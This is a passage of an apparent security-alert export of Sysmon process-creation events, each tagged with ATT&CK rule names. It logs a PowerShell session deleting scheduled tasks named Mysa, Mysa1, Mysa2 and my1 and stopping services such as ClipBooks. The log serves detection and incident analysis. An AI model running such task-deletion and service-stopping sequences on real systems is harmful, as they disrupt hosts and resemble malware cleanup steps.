Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.852",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.201 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001056b61900} +ProcessId: 3828 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.203083700Z"",""eventRecordID"":""2206"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.201\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001056b61900}\r\nProcessId: 3828\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.201"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001056b61900}"",""processId"":""3828"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.838",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.177 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-0010c6b41900} +ProcessId: 6012 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.179940400Z"",""eventRecordID"":""2205"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.177\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-0010c6b41900}\r\nProcessId: 6012\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.177"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-0010c6b41900}"",""processId"":""6012"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.821",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.151 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001037b31900} +ProcessId: 1552 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.154408200Z"",""eventRecordID"":""2204"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.151\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001037b31900}\r\nProcessId: 1552\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.151"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001037b31900}"",""processId"":""1552"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.806",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.105 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001071b11900} +ProcessId: 3308 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN my1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN my1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.111970200Z"",""eventRecordID"":""2203"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.105\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001071b11900}\r\nProcessId: 3308\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN my1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.105"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001071b11900}"",""processId"":""3308"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN my1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.759",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.077 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-0010dfaf1900} +ProcessId: 7244 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ClipBooks +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop ClipBooks",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.079532500Z"",""eventRecordID"":""2201"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.077\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-0010dfaf1900}\r\nProcessId: 7244\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ClipBooks\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.077"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-0010dfaf1900}"",""processId"":""7244"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ClipBooks"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.712",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.046 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001085ad1900} +ProcessId: 8152 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHasdelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.047903600Z"",""eventRecordID"":""2198"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.046\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001085ad1900}\r\nProcessId: 8152\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.046"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001085ad1900}"",""processId"":""8152"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHasdelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.696",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.034 